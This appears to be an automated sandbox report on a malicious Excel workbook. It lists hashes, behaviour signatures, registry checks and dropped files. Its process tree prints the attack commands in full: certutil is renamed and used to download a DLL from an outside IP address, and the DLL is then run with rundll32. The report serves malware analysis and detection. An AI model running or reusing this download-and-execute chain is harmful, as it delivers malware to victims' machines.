cancel_sub_VCP1234567890123.xlsb

General
Target

cancel_sub_VCP1234567890123.xlsb

Filesize

123KB

Completed

02-08-2021 09:36

Score
10 /10
MD5

9e1ee4a42c381eabcf2cde38a1aae7c9

SHA1

015bb306d9e54001d433b3ac2e7212b864f54ae2

SHA256

fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

Malware Config

Extracted

Language xlm4.0
Source
Signatures 7

Filter: none

Discovery
  • Process spawned unexpected child process
    cmd.execmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process15403128cmd.exeEXCEL.EXE
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process6363128cmd.exeEXCEL.EXE
  • Executes dropped EXE
    TTObk2.exe

    Reported IOCs

    pidprocess
    2264TTObk2.exe
  • Checks processor information in registry
    EXCEL.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0EXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHzEXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringEXCEL.EXE
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKUEXCEL.EXE
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOSEXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamilyEXCEL.EXE
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pidprocess
    3128EXCEL.EXE
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pidprocess
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
    3128EXCEL.EXE
  • Suspicious use of WriteProcessMemory
    EXCEL.EXEcmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3128 wrote to memory of 15403128EXCEL.EXEcmd.exe
    PID 3128 wrote to memory of 15403128EXCEL.EXEcmd.exe
    PID 3128 wrote to memory of 22643128EXCEL.EXETTObk2.exe
    PID 3128 wrote to memory of 22643128EXCEL.EXETTObk2.exe
    PID 3128 wrote to memory of 6363128EXCEL.EXEcmd.exe
    PID 3128 wrote to memory of 6363128EXCEL.EXEcmd.exe
    PID 636 wrote to memory of 2168636cmd.exerundll32.exe
    PID 636 wrote to memory of 2168636cmd.exerundll32.exe
Processes 5
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
      Process spawned unexpected child process
      PID:1540
    • C:\programdata\TTObk2\TTObk2.exe
      "C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
      Executes dropped EXE
      PID:2264
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:636
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
        PID:2168
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\ProgramData\TTObk2\TTObk2.exe

                          MD5

                          056c7d065f4622da9cc2848f47e2bae2

                          SHA1

                          6c6f18b0ec53dc63488961c4240ec584ac71c25f

                          SHA256

                          e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c

                          SHA512

                          db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

                        • C:\programdata\TTObk2\TTObk2.exe

                          MD5

                          056c7d065f4622da9cc2848f47e2bae2

                          SHA1

                          6c6f18b0ec53dc63488961c4240ec584ac71c25f

                          SHA256

                          e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c

                          SHA512

                          db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

                        • memory/636-276-0x0000000000000000-mapping.dmp

                        • memory/1540-264-0x0000000000000000-mapping.dmp

                        • memory/2168-277-0x0000000000000000-mapping.dmp

                        • memory/2264-274-0x0000000000000000-mapping.dmp

                        • memory/3128-123-0x00007FFA8F4D0000-0x00007FFA913C5000-memory.dmp

                        • memory/3128-122-0x00007FFA913D0000-0x00007FFA924BE000-memory.dmp

                        • memory/3128-121-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp

                        • memory/3128-118-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp

                        • memory/3128-117-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp

                        • memory/3128-116-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp

                        • memory/3128-115-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmp

                        • memory/3128-114-0x00007FF7AA140000-0x00007FF7AD6F6000-memory.dmp